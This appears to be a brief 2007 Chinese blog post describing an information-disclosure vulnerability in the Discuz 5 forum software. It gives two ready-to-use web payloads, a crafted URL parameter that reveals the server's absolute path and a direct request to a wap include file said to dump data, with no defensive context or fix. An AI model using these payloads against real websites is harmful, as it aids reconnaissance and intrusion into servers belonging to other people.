漏洞描述:DISCUZ5 暴库漏洞
在url后+&extra%5B%5D=page%3D1#pid1453,即可以暴出目标地址的绝对路径

另外一个:
在url后加wap/include/search.inc.php 也可以暴库!
posted on 2007-05-21 13:28  %5C  阅读(977)  评论(0编辑  收藏  举报